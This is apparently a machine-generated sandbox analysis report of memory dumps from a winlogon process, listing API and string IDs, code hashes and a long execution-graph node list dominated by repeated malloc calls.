                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1467
Total number of Limit Nodes: 2
execution_graph: [interactive call-graph data not reproduced: 1467 nodes linking function addresses in the 7ff72af2xxxx range to the APIs they call (EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, SetUnhandledExceptionFilter, VirtualQuery, VirtualProtect, _initterm, _cexit, malloc, memset, memcpy, wcscpy, wcscat, wcslen, _wcsnicmp, _wcsicmp, strstr, strcat, Sleep) and the edges between them]
7ff72af21394 malloc 3635->3636 3637 7ff72af214a9 3636->3637 3638 7ff72af21394 malloc 3637->3638 3639 7ff72af214b8 3638->3639 3640 7ff72af21394 malloc 3639->3640 3641 7ff72af214c7 3640->3641 3642 7ff72af21394 malloc 3641->3642 3643 7ff72af214d6 3642->3643 3644 7ff72af21394 malloc 3643->3644 3645 7ff72af214e5 3644->3645 3646 7ff72af21394 malloc 3645->3646 3647 7ff72af214f4 3646->3647 3648 7ff72af21394 malloc 3647->3648 3649 7ff72af21503 3648->3649 3650 7ff72af21394 malloc 3649->3650 3651 7ff72af21512 3650->3651 3652 7ff72af21394 malloc 3651->3652 3653 7ff72af21521 3652->3653 3654 7ff72af21530 3653->3654 3655 7ff72af21394 malloc 3653->3655 3656 7ff72af21394 malloc 3654->3656 3655->3654 3657 7ff72af2153a 3656->3657 3658 7ff72af21394 malloc 3657->3658 3659 7ff72af2153f 3658->3659 3660 7ff72af21394 malloc 3659->3660 3661 7ff72af2154e 3660->3661 3662 7ff72af21394 malloc 3661->3662 3663 7ff72af2155d 3662->3663 3664 7ff72af21394 malloc 3663->3664 3665 7ff72af2156c 3664->3665 3666 7ff72af21394 malloc 3665->3666 3667 7ff72af2157b 3666->3667 3668 7ff72af21394 malloc 3667->3668 3669 7ff72af2158a 3668->3669 3670 7ff72af21394 malloc 3669->3670 3671 7ff72af21599 3670->3671 3672 7ff72af21394 malloc 3671->3672 3673 7ff72af215a8 3672->3673 3674 7ff72af21394 malloc 3673->3674 3675 7ff72af215b7 3674->3675 3676 7ff72af21394 malloc 3675->3676 3677 7ff72af215c6 3676->3677 3678 7ff72af21394 malloc 3677->3678 3679 7ff72af215d5 3678->3679 3680 7ff72af21394 malloc 3679->3680 3681 7ff72af215e4 3680->3681 3682 7ff72af21394 malloc 3681->3682 3683 7ff72af215f3 3682->3683 3683->3231 3683->3235 3685 7ff72af21394 malloc 3684->3685 3686 7ff72af2142c 3685->3686 3687 7ff72af21431 3686->3687 3688 7ff72af21394 malloc 3686->3688 3689 7ff72af21394 malloc 3687->3689 3688->3687 3690 7ff72af2143b 3689->3690 3691 7ff72af21440 3690->3691 3692 7ff72af21394 malloc 3690->3692 3693 7ff72af21394 malloc 3691->3693 3692->3691 3694 7ff72af2144f 3693->3694 3695 7ff72af21394 malloc 3694->3695 3696 7ff72af2145e 3695->3696 
3697 7ff72af21394 malloc 3696->3697 3698 7ff72af2146d 3697->3698 3699 7ff72af21394 malloc 3698->3699 3700 7ff72af2147c 3699->3700 3701 7ff72af21394 malloc 3700->3701 3702 7ff72af2148b 3701->3702 3703 7ff72af21394 malloc 3702->3703 3704 7ff72af2149a 3703->3704 3705 7ff72af21394 malloc 3704->3705 3706 7ff72af214a9 3705->3706 3707 7ff72af21394 malloc 3706->3707 3708 7ff72af214b8 3707->3708 3709 7ff72af21394 malloc 3708->3709 3710 7ff72af214c7 3709->3710 3711 7ff72af21394 malloc 3710->3711 3712 7ff72af214d6 3711->3712 3713 7ff72af21394 malloc 3712->3713 3714 7ff72af214e5 3713->3714 3715 7ff72af21394 malloc 3714->3715 3716 7ff72af214f4 3715->3716 3717 7ff72af21394 malloc 3716->3717 3718 7ff72af21503 3717->3718 3719 7ff72af21394 malloc 3718->3719 3720 7ff72af21512 3719->3720 3721 7ff72af21394 malloc 3720->3721 3722 7ff72af21521 3721->3722 3723 7ff72af21530 3722->3723 3724 7ff72af21394 malloc 3722->3724 3725 7ff72af21394 malloc 3723->3725 3724->3723 3726 7ff72af2153a 3725->3726 3727 7ff72af21394 malloc 3726->3727 3728 7ff72af2153f 3727->3728 3729 7ff72af21394 malloc 3728->3729 3730 7ff72af2154e 3729->3730 3731 7ff72af21394 malloc 3730->3731 3732 7ff72af2155d 3731->3732 3733 7ff72af21394 malloc 3732->3733 3734 7ff72af2156c 3733->3734 3735 7ff72af21394 malloc 3734->3735 3736 7ff72af2157b 3735->3736 3737 7ff72af21394 malloc 3736->3737 3738 7ff72af2158a 3737->3738 3739 7ff72af21394 malloc 3738->3739 3740 7ff72af21599 3739->3740 3741 7ff72af21394 malloc 3740->3741 3742 7ff72af215a8 3741->3742 3743 7ff72af21394 malloc 3742->3743 3744 7ff72af215b7 3743->3744 3745 7ff72af21394 malloc 3744->3745 3746 7ff72af215c6 3745->3746 3747 7ff72af21394 malloc 3746->3747 3748 7ff72af215d5 3747->3748 3749 7ff72af21394 malloc 3748->3749 3750 7ff72af215e4 3749->3750 3751 7ff72af21394 malloc 3750->3751 3752 7ff72af215f3 3751->3752 3752->3295 3754 7ff72af21394 malloc 3753->3754 3755 7ff72af2143b 3754->3755 3756 7ff72af21440 3755->3756 3757 7ff72af21394 malloc 3755->3757 3758 7ff72af21394 malloc 
3756->3758 3757->3756 3759 7ff72af2144f 3758->3759 3760 7ff72af21394 malloc 3759->3760 3761 7ff72af2145e 3760->3761 3762 7ff72af21394 malloc 3761->3762 3763 7ff72af2146d 3762->3763 3764 7ff72af21394 malloc 3763->3764 3765 7ff72af2147c 3764->3765 3766 7ff72af21394 malloc 3765->3766 3767 7ff72af2148b 3766->3767 3768 7ff72af21394 malloc 3767->3768 3769 7ff72af2149a 3768->3769 3770 7ff72af21394 malloc 3769->3770 3771 7ff72af214a9 3770->3771 3772 7ff72af21394 malloc 3771->3772 3773 7ff72af214b8 3772->3773 3774 7ff72af21394 malloc 3773->3774 3775 7ff72af214c7 3774->3775 3776 7ff72af21394 malloc 3775->3776 3777 7ff72af214d6 3776->3777 3778 7ff72af21394 malloc 3777->3778 3779 7ff72af214e5 3778->3779 3780 7ff72af21394 malloc 3779->3780 3781 7ff72af214f4 3780->3781 3782 7ff72af21394 malloc 3781->3782 3783 7ff72af21503 3782->3783 3784 7ff72af21394 malloc 3783->3784 3785 7ff72af21512 3784->3785 3786 7ff72af21394 malloc 3785->3786 3787 7ff72af21521 3786->3787 3788 7ff72af21530 3787->3788 3789 7ff72af21394 malloc 3787->3789 3790 7ff72af21394 malloc 3788->3790 3789->3788 3791 7ff72af2153a 3790->3791 3792 7ff72af21394 malloc 3791->3792 3793 7ff72af2153f 3792->3793 3794 7ff72af21394 malloc 3793->3794 3795 7ff72af2154e 3794->3795 3796 7ff72af21394 malloc 3795->3796 3797 7ff72af2155d 3796->3797 3798 7ff72af21394 malloc 3797->3798 3799 7ff72af2156c 3798->3799 3800 7ff72af21394 malloc 3799->3800 3801 7ff72af2157b 3800->3801 3802 7ff72af21394 malloc 3801->3802 3803 7ff72af2158a 3802->3803 3804 7ff72af21394 malloc 3803->3804 3805 7ff72af21599 3804->3805 3806 7ff72af21394 malloc 3805->3806 3807 7ff72af215a8 3806->3807 3808 7ff72af21394 malloc 3807->3808 3809 7ff72af215b7 3808->3809 3810 7ff72af21394 malloc 3809->3810 3811 7ff72af215c6 3810->3811 3812 7ff72af21394 malloc 3811->3812 3813 7ff72af215d5 3812->3813 3814 7ff72af21394 malloc 3813->3814 3815 7ff72af215e4 3814->3815 3816 7ff72af21394 malloc 3815->3816 3817 7ff72af215f3 3816->3817 3817->3298 3819 7ff72af21394 malloc 3818->3819 3820 
7ff72af214c7 3819->3820 3821 7ff72af21394 malloc 3820->3821 3822 7ff72af214d6 3821->3822 3823 7ff72af21394 malloc 3822->3823 3824 7ff72af214e5 3823->3824 3825 7ff72af21394 malloc 3824->3825 3826 7ff72af214f4 3825->3826 3827 7ff72af21394 malloc 3826->3827 3828 7ff72af21503 3827->3828 3829 7ff72af21394 malloc 3828->3829 3830 7ff72af21512 3829->3830 3831 7ff72af21394 malloc 3830->3831 3832 7ff72af21521 3831->3832 3833 7ff72af21530 3832->3833 3834 7ff72af21394 malloc 3832->3834 3835 7ff72af21394 malloc 3833->3835 3834->3833 3836 7ff72af2153a 3835->3836 3837 7ff72af21394 malloc 3836->3837 3838 7ff72af2153f 3837->3838 3839 7ff72af21394 malloc 3838->3839 3840 7ff72af2154e 3839->3840 3841 7ff72af21394 malloc 3840->3841 3842 7ff72af2155d 3841->3842 3843 7ff72af21394 malloc 3842->3843 3844 7ff72af2156c 3843->3844 3845 7ff72af21394 malloc 3844->3845 3846 7ff72af2157b 3845->3846 3847 7ff72af21394 malloc 3846->3847 3848 7ff72af2158a 3847->3848 3849 7ff72af21394 malloc 3848->3849 3850 7ff72af21599 3849->3850 3851 7ff72af21394 malloc 3850->3851 3852 7ff72af215a8 3851->3852 3853 7ff72af21394 malloc 3852->3853 3854 7ff72af215b7 3853->3854 3855 7ff72af21394 malloc 3854->3855 3856 7ff72af215c6 3855->3856 3857 7ff72af21394 malloc 3856->3857 3858 7ff72af215d5 3857->3858 3859 7ff72af21394 malloc 3858->3859 3860 7ff72af215e4 3859->3860 3861 7ff72af21394 malloc 3860->3861 3862 7ff72af215f3 3861->3862 3862->3358 3864 7ff72af21394 malloc 3863->3864 3865 7ff72af215e4 3864->3865 3866 7ff72af21394 malloc 3865->3866 3867 7ff72af215f3 3866->3867 3867->3358 3869 7ff72af21394 malloc 3868->3869 3870 7ff72af2149a 3869->3870 3871 7ff72af21394 malloc 3870->3871 3872 7ff72af214a9 3871->3872 3873 7ff72af21394 malloc 3872->3873 3874 7ff72af214b8 3873->3874 3875 7ff72af21394 malloc 3874->3875 3876 7ff72af214c7 3875->3876 3877 7ff72af21394 malloc 3876->3877 3878 7ff72af214d6 3877->3878 3879 7ff72af21394 malloc 3878->3879 3880 7ff72af214e5 3879->3880 3881 7ff72af21394 malloc 3880->3881 3882 7ff72af214f4 
3881->3882 3883 7ff72af21394 malloc 3882->3883 3884 7ff72af21503 3883->3884 3885 7ff72af21394 malloc 3884->3885 3886 7ff72af21512 3885->3886 3887 7ff72af21394 malloc 3886->3887 3888 7ff72af21521 3887->3888 3889 7ff72af21530 3888->3889 3890 7ff72af21394 malloc 3888->3890 3891 7ff72af21394 malloc 3889->3891 3890->3889 3892 7ff72af2153a 3891->3892 3893 7ff72af21394 malloc 3892->3893 3894 7ff72af2153f 3893->3894 3895 7ff72af21394 malloc 3894->3895 3896 7ff72af2154e 3895->3896 3897 7ff72af21394 malloc 3896->3897 3898 7ff72af2155d 3897->3898 3899 7ff72af21394 malloc 3898->3899 3900 7ff72af2156c 3899->3900 3901 7ff72af21394 malloc 3900->3901 3902 7ff72af2157b 3901->3902 3903 7ff72af21394 malloc 3902->3903 3904 7ff72af2158a 3903->3904 3905 7ff72af21394 malloc 3904->3905 3906 7ff72af21599 3905->3906 3907 7ff72af21394 malloc 3906->3907 3908 7ff72af215a8 3907->3908 3909 7ff72af21394 malloc 3908->3909 3910 7ff72af215b7 3909->3910 3911 7ff72af21394 malloc 3910->3911 3912 7ff72af215c6 3911->3912 3913 7ff72af21394 malloc 3912->3913 3914 7ff72af215d5 3913->3914 3915 7ff72af21394 malloc 3914->3915 3916 7ff72af215e4 3915->3916 3917 7ff72af21394 malloc 3916->3917 3918 7ff72af215f3 3917->3918 3918->3359 3919 7ff72af2149a 3918->3919 3920 7ff72af21394 malloc 3919->3920 3921 7ff72af214a9 3920->3921 3922 7ff72af21394 malloc 3921->3922 3923 7ff72af214b8 3922->3923 3924 7ff72af21394 malloc 3923->3924 3925 7ff72af214c7 3924->3925 3926 7ff72af21394 malloc 3925->3926 3927 7ff72af214d6 3926->3927 3928 7ff72af21394 malloc 3927->3928 3929 7ff72af214e5 3928->3929 3930 7ff72af21394 malloc 3929->3930 3931 7ff72af214f4 3930->3931 3932 7ff72af21394 malloc 3931->3932 3933 7ff72af21503 3932->3933 3934 7ff72af21394 malloc 3933->3934 3935 7ff72af21512 3934->3935 3936 7ff72af21394 malloc 3935->3936 3937 7ff72af21521 3936->3937 3938 7ff72af21530 3937->3938 3939 7ff72af21394 malloc 3937->3939 3940 7ff72af21394 malloc 3938->3940 3939->3938 3941 7ff72af2153a 3940->3941 3942 7ff72af21394 malloc 3941->3942 3943 
7ff72af2153f 3942->3943 3944 7ff72af21394 malloc 3943->3944 3945 7ff72af2154e 3944->3945 3946 7ff72af21394 malloc 3945->3946 3947 7ff72af2155d 3946->3947 3948 7ff72af21394 malloc 3947->3948 3949 7ff72af2156c 3948->3949 3950 7ff72af21394 malloc 3949->3950 3951 7ff72af2157b 3950->3951 3952 7ff72af21394 malloc 3951->3952 3953 7ff72af2158a 3952->3953 3954 7ff72af21394 malloc 3953->3954 3955 7ff72af21599 3954->3955 3956 7ff72af21394 malloc 3955->3956 3957 7ff72af215a8 3956->3957 3958 7ff72af21394 malloc 3957->3958 3959 7ff72af215b7 3958->3959 3960 7ff72af21394 malloc 3959->3960 3961 7ff72af215c6 3960->3961 3962 7ff72af21394 malloc 3961->3962 3963 7ff72af215d5 3962->3963 3964 7ff72af21394 malloc 3963->3964 3965 7ff72af215e4 3964->3965 3966 7ff72af21394 malloc 3965->3966 3967 7ff72af215f3 3966->3967 3967->3359 3967->3363 3969 7ff72af21394 malloc 3968->3969 3970 7ff72af2148b 3969->3970 3971 7ff72af21394 malloc 3970->3971 3972 7ff72af2149a 3971->3972 3973 7ff72af21394 malloc 3972->3973 3974 7ff72af214a9 3973->3974 3975 7ff72af21394 malloc 3974->3975 3976 7ff72af214b8 3975->3976 3977 7ff72af21394 malloc 3976->3977 3978 7ff72af214c7 3977->3978 3979 7ff72af21394 malloc 3978->3979 3980 7ff72af214d6 3979->3980 3981 7ff72af21394 malloc 3980->3981 3982 7ff72af214e5 3981->3982 3983 7ff72af21394 malloc 3982->3983 3984 7ff72af214f4 3983->3984 3985 7ff72af21394 malloc 3984->3985 3986 7ff72af21503 3985->3986 3987 7ff72af21394 malloc 3986->3987 3988 7ff72af21512 3987->3988 3989 7ff72af21394 malloc 3988->3989 3990 7ff72af21521 3989->3990 3991 7ff72af21530 3990->3991 3992 7ff72af21394 malloc 3990->3992 3993 7ff72af21394 malloc 3991->3993 3992->3991 3994 7ff72af2153a 3993->3994 3995 7ff72af21394 malloc 3994->3995 3996 7ff72af2153f 3995->3996 3997 